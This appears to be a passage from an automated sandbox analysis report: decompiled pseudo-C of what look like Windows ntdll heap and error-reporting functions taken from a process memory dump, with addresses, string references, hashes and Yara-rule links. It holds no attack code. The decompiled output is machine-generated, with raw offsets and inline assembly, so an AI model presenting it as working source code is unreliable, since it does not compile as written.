                                                        Function 04948DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 71%
                                                        			E04948DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4970d50);
				E048ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04925720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L048EDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L048EDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E048ED130(_t34, _t39, _t40);
			}





                                                        0x04948df1
                                                        0x04948df1
                                                        0x04948df1
                                                        0x04948df1
                                                        0x04948df1
                                                        0x04948df1
                                                        0x04948df3
                                                        0x04948df8
                                                        0x04948dfd
                                                        0x04948e00
                                                        0x04948e0e
                                                        0x04948e2a
                                                        0x04948e36
                                                        0x04948e38
                                                        0x04948e3c
                                                        0x04948e46
                                                        0x04948e46
                                                        0x04948e36
                                                        0x04948e50
                                                        0x04948e56
                                                        0x04948e59
                                                        0x04948e5c
                                                        0x04948e60
                                                        0x04948e67
                                                        0x04948e6d
                                                        0x04948e73
                                                        0x04948e74
                                                        0x04948eb1
                                                        0x04948ebd

                                                        Strings
                                                        • Critical error detected %lx, xrefs: 04948E21
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Critical error detected %lx
                                                        • API String ID: 0-802127002
                                                        • Opcode ID: 844d133ac682130169f68bd2557822866d123afa73ce42be8e10122fa096f4df
                                                        • Instruction ID: a798ac721c46b10d2603a21ad6acad40eca61404da807a0b9928ba69c12ee3f3
                                                        • Opcode Fuzzy Hash: 844d133ac682130169f68bd2557822866d123afa73ce42be8e10122fa096f4df
                                                        • Instruction Fuzzy Hash: E9117975D04348EBEF24EFA9C509BEDBBF4AB45714F20462DD428AB281D3746606CF15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0492FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0492FF60
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                        • API String ID: 0-1911121157
                                                        • Opcode ID: 39eed129f8f74481d03e225c932ebbe71cdad36ac88e948c3cce826afac0e8fb
                                                        • Instruction ID: 7b11784377a6874579dd93c4111317aeb820462c42c6cbeb16c3ec276383189e
                                                        • Opcode Fuzzy Hash: 39eed129f8f74481d03e225c932ebbe71cdad36ac88e948c3cce826afac0e8fb
                                                        • Instruction Fuzzy Hash: 89114471590144EFEB12EF54CA48FE8BBB1FF08708F148468E5049B2A4C778B944DB10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04965BA5, Relevance: .6, Instructions: 592COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E04965BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4971178);
				E048ED0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04964C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E048DD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04965542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x49860e8;
								if( *0x49860e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x49860e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E048D9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E048D6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E048DF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E048DF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E048DF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E048DFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E048DFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E048DF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E048DF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04964CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E048ED130(_t427, _t494, _t511);
				}
			}










































































                                                        0x04965ba5
                                                        0x04965baa
                                                        0x04965baf
                                                        0x04965bb4
                                                        0x04965bb6
                                                        0x04965bbc
                                                        0x04965bbe
                                                        0x04965bc4
                                                        0x04965bcd
                                                        0x04965bd3
                                                        0x04965bd6
                                                        0x04965bdc
                                                        0x04965be0
                                                        0x04965be3
                                                        0x04965beb
                                                        0x04965bf2
                                                        0x04965bf8
                                                        0x04965bfe
                                                        0x04965c04
                                                        0x04965c0e
                                                        0x04965c18
                                                        0x04965c1f
                                                        0x04965c25
                                                        0x04965c2a
                                                        0x04965c2c
                                                        0x04965c32
                                                        0x04965c3a
                                                        0x04965c3f
                                                        0x04965c42
                                                        0x04965c48
                                                        0x04965c5b
                                                        0x04965c5b
                                                        0x04965c2c
                                                        0x04965cb7
                                                        0x04965cb9
                                                        0x04965cbf
                                                        0x04965cc2
                                                        0x04965cca
                                                        0x04965ccb
                                                        0x04965ccb
                                                        0x04965cd1
                                                        0x04965cd7
                                                        0x04965cda
                                                        0x04965ce1
                                                        0x04965ce4
                                                        0x04965ce7
                                                        0x04965ced
                                                        0x04965cf3
                                                        0x04965cf9
                                                        0x04965cff
                                                        0x04965d08
                                                        0x04965d0a
                                                        0x04965d0e
                                                        0x04965d10
                                                        0x00000000
                                                        0x00000000
                                                        0x04965d16
                                                        0x04965d1a
                                                        0x00000000
                                                        0x00000000
                                                        0x04965d20
                                                        0x04965d22
                                                        0x04965d25
                                                        0x04965d2f
                                                        0x04965d2f
                                                        0x04965d33
                                                        0x04965d3d
                                                        0x04965d49
                                                        0x04965d4b
                                                        0x00000000
                                                        0x00000000
                                                        0x04965d5a
                                                        0x04965d5d
                                                        0x04965d60
                                                        0x00000000
                                                        0x00000000
                                                        0x04965d66
                                                        0x04965d69
                                                        0x00000000
                                                        0x00000000
                                                        0x04965d6f
                                                        0x04965d6f
                                                        0x04965d73
                                                        0x04965d79
                                                        0x04965d7f
                                                        0x04965d86
                                                        0x04965d95
                                                        0x04965d98
                                                        0x04965dba
                                                        0x04965dcb
                                                        0x04965dce
                                                        0x04965dd3
                                                        0x04965dd6
                                                        0x04965dd8
                                                        0x04965de6
                                                        0x04965dec
                                                        0x04965dee
                                                        0x04965df1
                                                        0x04965df3
                                                        0x0496635a
                                                        0x0496635a
                                                        0x00000000
                                                        0x0496635a
                                                        0x04965dfe
                                                        0x04965e02
                                                        0x04965e05
                                                        0x04965e07
                                                        0x04965e10
                                                        0x04965e13
                                                        0x04965e1b
                                                        0x04965e1c
                                                        0x04965e21
                                                        0x04965e22
                                                        0x04965e23
                                                        0x04965e25
                                                        0x04965e2a
                                                        0x04965e2c
                                                        0x04965e2e
                                                        0x04965e36
                                                        0x04965e39
                                                        0x04965e42
                                                        0x04965e47
                                                        0x04965e4d
                                                        0x04965e54
                                                        0x04965e54
                                                        0x04965e54
                                                        0x04965e2e
                                                        0x04965e5c
                                                        0x04965e5f
                                                        0x04965e62
                                                        0x04965e64
                                                        0x04965e6b
                                                        0x04965e70
                                                        0x04965e7a
                                                        0x04965e7a
                                                        0x04965e7a
                                                        0x04965e6b
                                                        0x04965e7e
                                                        0x04965e7f
                                                        0x04965e7f
                                                        0x04965e81
                                                        0x04965e87
                                                        0x04965e8b
                                                        0x04965e8c
                                                        0x04965e8c
                                                        0x04965e8c
                                                        0x04965e9a
                                                        0x04965e9c
                                                        0x04965ea2
                                                        0x04965ea6
                                                        0x04965f50
                                                        0x04965f50
                                                        0x04965f57
                                                        0x04965f66
                                                        0x04965f66
                                                        0x04965f66
                                                        0x04965f68
                                                        0x04965f6a
                                                        0x049663d0
                                                        0x00000000
                                                        0x04965f70
                                                        0x04965f70
                                                        0x04965f91
                                                        0x04965f9c
                                                        0x04965f9e
                                                        0x04965fa4
                                                        0x04965fa6
                                                        0x0496638c
                                                        0x04966392
                                                        0x049663a1
                                                        0x049663a7
                                                        0x049663af
                                                        0x049663af
                                                        0x049663bd
                                                        0x049663d8
                                                        0x00000000
                                                        0x049663d8
                                                        0x04965fac
                                                        0x04965fb2
                                                        0x04965fb4
                                                        0x04965fbd
                                                        0x04965fc6
                                                        0x04965fce
                                                        0x04965fd4
                                                        0x04965fdc
                                                        0x04965fec
                                                        0x04965fed
                                                        0x04965fee
                                                        0x04965fef
                                                        0x04965ff9
                                                        0x04965ffa
                                                        0x04965ffb
                                                        0x04965ffc
                                                        0x04966000
                                                        0x04966004
                                                        0x04966012
                                                        0x04966012
                                                        0x04966018
                                                        0x04966019
                                                        0x0496601a
                                                        0x0496601b
                                                        0x0496601c
                                                        0x04966020
                                                        0x04966059
                                                        0x0496605c
                                                        0x04966061
                                                        0x04966061
                                                        0x04966022
                                                        0x04966022
                                                        0x04966022
                                                        0x04966025
                                                        0x0496602a
                                                        0x0496602b
                                                        0x04966031
                                                        0x04966037
                                                        0x04966038
                                                        0x0496603e
                                                        0x04966048
                                                        0x04966049
                                                        0x0496604a
                                                        0x0496604b
                                                        0x0496604c
                                                        0x0496604d
                                                        0x04966053
                                                        0x04966054
                                                        0x04966054
                                                        0x04966062
                                                        0x04966065
                                                        0x04966067
                                                        0x0496606a
                                                        0x04966070
                                                        0x04966075
                                                        0x04966076
                                                        0x04966081
                                                        0x04966087
                                                        0x04966095
                                                        0x04966099
                                                        0x0496609e
                                                        0x049660a4
                                                        0x049660ae
                                                        0x049660b0
                                                        0x049660b3
                                                        0x049660b6
                                                        0x049660b8
                                                        0x049660ba
                                                        0x049660ba
                                                        0x049660ba
